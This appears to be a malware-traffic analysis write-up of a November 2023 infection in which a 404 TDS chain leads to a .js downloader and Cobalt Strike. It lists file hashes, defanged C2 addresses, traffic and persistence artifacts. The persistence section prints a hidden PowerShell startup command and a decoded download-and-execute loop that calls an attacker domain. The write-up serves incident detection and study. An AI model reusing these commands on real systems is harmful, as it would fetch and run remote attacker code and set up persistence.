2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE

NOTES:

ASSOCIATED FILES:

 

2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE

NOTES:

- Unidentified malware from 404 TDS distribution today.

INFECTION CHAIN:

- URL --> 404 TDS chain --> .js file --> initial C2 --> follow-up C2 --> Cobalt Strike

VICTIM ENVIRONMENT:

- Domain: northstartech.online
- LAN segment: 10.11.7.0/24 (10.11.7.0 thru 10.11.7.255)
- Domain Controller: WIN-EKM7LG89YEC at 10.11.7.17
- Victim host: DESKTOP-A9KAOQ2 at 10.11.7.120
- Victim Windows account name: owen.hudson

ASSOCIATED MALWARE:

- SHA256 hash: cf40754a3dc7d536b455086f349f9d7445bc4bcd01b6718bd800a80d6f9dca95
- File size: 2,439 bytes
- File name: KPUW1359_2087960.js
- File type: ASCII text, with very long lines (945)
- File description: .js file downloaded from 404 TDS link

- SHA256 hash: d09c7908c39e2a3255811722903d37df6bf7a2083958abff5ded2732f412047e
- File size: 318,464 bytes
- File location: hxxp://170.130.165[.]37/RClient.dll
- Saved location: C:\Users\Public\sdriver.dll
- File type: PE32+ executable (DLL) (console) x86-64, for MS Windows
- File description: 64-bit DLL for unidentified malware
- Run method: unknown

PERSISTENCE:

- Description: Windows shortcut in Start Menu's Startup directory
- Location: C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
- Shortcut: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -Exec -nop -enc 
  (Get-ItemProperty -Path 'HKCU:\Software\Classes\msslnooo' -Name t).t

REGISTRY UPDATE:

- Key: HKEY_CURRENT_USER\SOFTWARE\Classes\msslnooo
- Value 0
- Value Name: t
- Value Type: REG_SZ
- Value Data: [base64 string]
- Decoded base64 string: while($true){IEX(New-Object Net.WebClient).DownloadString("hxxp://ftroftrodro[.]top:80/
  debug/fBTRdJs="); Start-Sleep -s 3600}
- Note: No traffic seen to ftroftrodro[.]top, but it resolved to 170.130.165[.]37 when pinged

OTHER ARTIFACTS:

- SHA256 hash: 7e347a488aa085b1939d86488a6d204d0782604c9fad56731054da789b27edeb
- File size: 467 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w1.js

- SHA256 hash: 746756065971e5168ecaeb5507aa6c449bbb88e90bb3537be4a470299a0679aa
- File size: 289 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w2.js

INFECTION TRAFFIC:

REDIRECT PATH TO INITIAL .JS FILE DOWNLOAD:

- port 443 - hxxps://truckjeepsuvparts[.]com/7b4/88ooy4cpn4j
- port 443 - hxxps://tradembs[.]com/wgaj4w
- port 443 - hxxps://medilabr[.]com/wnmwhg/

INITIAL C2:

- 170.130.55[.]46 port 80 - 170.130.55[.]46 - POST /

FOLLOW-UP C2:

- 170.130.55[.]117 port 8080 - TLSv1.2 HTTPS traffic, self-signed certificate
- 170.130.55[.]117 port 443 - TCP traffic, not encrypted, but with plain text and base64 strings

FOLLOW-UP REMOTE ACCESS MALWARE:

- 170.130.165[.]37 port 80 - 170.130.165[.]37 - GET /RClient.dll
- 170.130.165[.]107 port 1444 - TCP traffic

COBALT STRIKE:

- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /ah
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.slim.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - POST /jquery-3.3.2.min.js?__cfduid=[18 or 19 character base64 text]

TRAFFIC FROM THE INFECTED HOST TO THE DOMAIN CONTROLLER:

- 10.11.7.17 port 5985 - win-ekm7lg89yec.northstartech[.]online:5985 - POST /wsman?PSVersion=5.1.19041.3570

 

Click here to return to the main page.